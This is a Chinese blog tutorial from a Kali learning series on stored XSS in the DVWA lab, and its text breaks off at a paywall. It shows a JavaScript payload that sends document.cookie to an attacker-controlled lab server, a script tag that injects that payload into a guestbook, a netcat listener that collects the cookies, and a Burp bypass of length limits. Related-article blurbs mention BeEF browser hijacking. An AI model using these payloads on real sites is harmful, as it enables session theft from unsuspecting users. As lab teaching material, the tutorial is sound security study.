kali渗透学习-Web渗透XSS(三)存储型XSS、DOM型XSS、神器BEFF

最新推荐文章于 2024-03-27 17:19:51 发布
最新推荐文章于 2024-03-27 17:19:51 发布
阅读量259 收藏
点赞数
分类专栏: xss和csrf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43239236/article/details/107477037
版权
本文介绍了Web渗透中的XSS攻击,包括存储型XSS和DOM型XSS的利用方法。重点讲解了如何利用Burp Suite进行测试,以及通过Apache2部署JS文件来盗取客户端cookie。同时,文章还提到了浏览器exploitation框架(BEFF),它是用于Web攻击的平台,由Ruby编写,包含多种模块和payload,可用于浏览器信息收集、键盘记录及漏洞利用等。
摘要由CSDN通过智能技术生成

存储型XSS

1、可长期存储于服务器端

2、每次用户访问都会被执行js脚本,攻击者只需侦听指定端口

#攻击利用方法大体等于反射型xss利用

##多出现在留言板等位置

*推荐使用burpsuite
a、观察返回结果,是否原封不动地返回输入数据?是否有其他标签
在这里插入图片描述
js代码通过留言板存储在服务器中,所以每次点击留言板链接,都会弹出xss弹窗
在这里插入图片描述
注入后会永久在服务器端,每次访问都会下发该注入。
用dvwa测试的时候消除注入需在设置中重置数据库

b、测试加载攻击者控制的服务器中的js文件

#启动apache2【默认侦听80端口】
在这里插入图片描述
a.js 【盗取客户端cookie信息,并把它上传到攻击者控制的服务器的PHP文件】

var img = new Image();
img.src = "http://192.168.56.102:88/cookies.php?
cookie="+document.cookie;

***默认在客户端进行长度的限制,可用burpsuite进行绕过或直接修改HTML代码中的长度限制  【安全性好的,同时在客户端跟服务器端进行长度限制】
在这里插入图片描述

<script src="http://192.168.56.102/a.js"></script>

使用nc演示效果,侦听88端口,提交成功/刷新页面,即可成功获得cookie
在这里插入图片描述
代码审计  【以下代码只是对输入数据进行过滤】

<?php

if(isset($_POST['btnSign']))
{
   

   $message = trim($_POST['mtxMessage']);
   $name    = trim($_POST['txtName']);

   // Sanitize message input
   $me
最低0.47元/天 解锁文章
唐吉可黄
关注
专栏目录
Kali Linux-网络安全之-XSS 跨站脚本攻击原理及 DVWA 靶机的搭建
xueshenlaila的博客
12-31 1381
XSS 跨站脚本攻击 使用 JavaScript 创建 Cookie JavaScript 可以使用 document.cookie 属性来创建 、读叏、及删除 cookie。 例 1:JavaScript 中,创建 cookie 如下所示: document.cookie=“username=John Doe”; 例 2:你还可以为 cookie 添加一个过期时间(以 UTC 戒 GMT 时间)。默认情况下,cookie 在 浏览器关闭时删除: document.cookie=“username=John
DVWA系列()——使用Burpsuite进行反射XSS(反射跨站脚本攻击)
橘子女侠
05-05 3848
1. XSS简介 (1)XSS(cross-site scripting) 跨站脚本攻击,通过web站点漏洞,向客户端交付恶意脚本代码,这些代码可以被浏览器成功的执行,从而实现对客户端的攻击; XSS可以盗取客户端cookie,将客户端重定向到第方网站; (2)客户端脚本语言 弹窗警告、广告; JavaScript; 在浏览器中执行; (3)JavaScript 与J...
kali 中安装 beef-xss
挖到0day了吗?
02-27 816
XSS攻击(Cross-Site Scripting)是指攻击者在网页中注入恶意脚本代码,使受害者在浏览器中运行该脚本,从而达到攻击目的。beef是一种利用浏览器漏洞的攻击工具,可以在浏览器端运行恶意脚本。本文将介绍安装beef。新版的kail已经不自带beef工具了,需要自己下载。
网络安全:Kali Linux 进行SQL注入与XSS漏洞利用
最新发布
cronaldo91的博客
03-27 1903
(3) 查看Kali Linux (2022.4)系统IP地址。(2)查看Kali Linux (2022.4)系统版本。(5)Kali主机 ping Windows主机。(14)Windows主机弹出登录界面。(7)获取当前数据库指定的表的字段名。(4)Windows 查看IP地址。(6)获取当前数据库中所有表的名称。(8)获取指定库指定表指定字段的值。(1) LAMP(LNMP)平台。执行 (选择Execute)(15)beef获取账号及密码。(5)启动beef-xss。(9)beef获取目标主机。
DVWA的Xss跨站脚本攻击(存储
AZK707的博客
03-17 1789
目录 存储 一、初级 1)在name框里注入 2)在message框里注入(输入的内容不一致,保持区分) 3)burpsuite抓包修改(输入的内容不一致,保持区分) (抓包是另一种方法,所有的xss都可以用这个方式) 二、中级 1)大写绕过 2)双写绕过ipt>alert(/50zky_mtest_01_2/) 、高级 换成别发标签,例如图片标签 四、impossible级别 存储 一、初级 1.发现正常输入name时,有长度限...
渗透测试 2 --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
墨鱼菜鸡
07-11 3182
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
kali网络渗透实验XSS和SQL注入
FFFde博客
01-01 954
XSS和SQL注入 实验目的: 了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境: Kali Linux 2、Windows Server 网络环境: 交换网络结构 实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA XSS部分:利用Beef劫持被攻击者客户端浏览器 实验环境
kali网络渗透实验xss攻击与sql注入
qq_51555426的博客
11-27 3474
实验 XSS和SQL注入 实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境:Kali Linux 2、Windows Server 网络环境:交换网络结构 实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA 实验步骤: XSS部分:利用Beef劫持被攻击者客户端浏
beef-xss安装与使用
Bu2n的博客
12-07 3434
文章目录kali安装与更新软件源beef-xss安装快速上手beef-xss kali安装与更新软件源 传送门 beef-xss安装 sudo apt-get install beef-xss sudo beef-xss 第一次启动beef要修改密码,要仔细看清楚 快速上手beef-xss http://127.0.0.1:3000/ui/panel beef的管理面板 输入自己的账号密码默认beef beef 这样就能进入到管理页面 查看kali的ip地址 构造下面js代码,想办法给其他人
burpsuite检测xss漏洞
夜车星繁的博客
07-17 7667
burpsuite检测xss漏洞 XSS(跨站脚本攻击)漏洞是Web应用程序中最常见的漏洞之一,它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的,比如获取用户的cookie,导航到恶意网站,携带木马等。根据其触发方式的不同,通常分为反射XSS存储XSSDOM-baseXSS漏洞“注...
XSS漏洞:利用多次提交技巧实现存储XSS攻击
qq_68163788的博客
01-21 2378
存储XSS(Cross-Site Scripting)是一种Web应用程序安全漏洞,攻击者通过在受害者的浏览器上执行恶意脚本,从而获取用户的敏感信息。存储XSS攻击的主要原理是将恶意脚本存储在服务器端,然后当用户访问包含该恶意脚本的页面时,恶意脚本会被执行。 攻击者通常会在受害者能够输入内容的地方(例如论坛、博客评论、搜索框等)注入恶意脚本。当其他用户访问包含恶意脚本的页面时,他们的浏览器会执行这些脚本,从而导致攻击者能够窃取用户的会话令牌、cookie或其他敏感信息。
Web安全测试之XSS
weixin_43090420的博客
06-16 506
XSS全称(Cross Site Scripting)跨站脚本攻击,是Web程序中最常见的漏洞,指攻击者在网页中嵌入客户端脚本(例如JavaScript),当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的,比如获取用户的Cookie,导航到恶意网站,携带木马等。 作为测试人员,需要了解XSS的原理,攻击场景,如何修复,才能有效的防止XSS的发生。 阅读目录 XSS是如何发生...
burp靶场--xss上篇【1-15】
qq_33168924的博客
01-29 1833
跨站脚本 (XSS) 是一种通常出现在 Web 应用程序中的计算机安全漏洞XSS 允许攻击者将恶意代码注入网站,然后在访问该网站的任何人的浏览器中执行该代码。这可能允许攻击者窃取敏感信息,例如用户登录凭据,或执行其他恶意操作。XSS 攻击主要有 3 种类:反射 XSS:在反射 XSS 攻击中,恶意代码嵌入到发送给受害者的链接中。当受害者点击链接时,代码就会在他们的浏览器中执行。例如,攻击者可以创建包含恶意 JavaScript 的链接,并将其通过电子邮件发送给受害者。
2020-11-22
qq_51370368的博客
11-24 395
实验 XSS和SQL注入 实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境:Kali Linux 2、Windows Server 网络环境:交换网络结构 实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA 实验步骤: XSS部分:利用Beef劫持被攻击者客户
kali渗透测试与教学笔记4:XSS
lm19770429的专栏
04-21 301
靶机应用地址:http://10.10.10.129/mutillidae/index.php 想成功执行一个XSS有2步:攻击者数据没有被过滤掉、web应用返回的数据没有经过编码 因此一个安全的web应用要对特殊字符进行编码,最好是进行十六进制编码。 OWASP给出了防止XSS指南。国外网站不好访问,这里提供CSDN的两个地址: https://blog.csdn.net/aerchi/...
网络渗透测试实验 XSS和SQL注入
weixin_62571616的博客
11-26 777
XSS和SQL注入
Kali beef-xss实现Xss详细教程。
sunwanfulove的博客
09-28 3518
Kali beef-xss实现Xss详细教程。
手把手教学安全渗透测试从基础到实践
12-30
本课程基于Kali linux教学安全渗透测试,模拟黑客进行攻击测试。
web安全之kali-xss-beef剑心哥哥
12-24
Kali Linux是一种用于网络安全测试和渗透测试的操作系统,它具有强大的工具和功能,可以用于检测和解决网站的安全漏洞XSS(跨站脚本攻击)是一种常见的网络安全漏洞,可以通过在网页中插入恶意脚本来获取用户的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值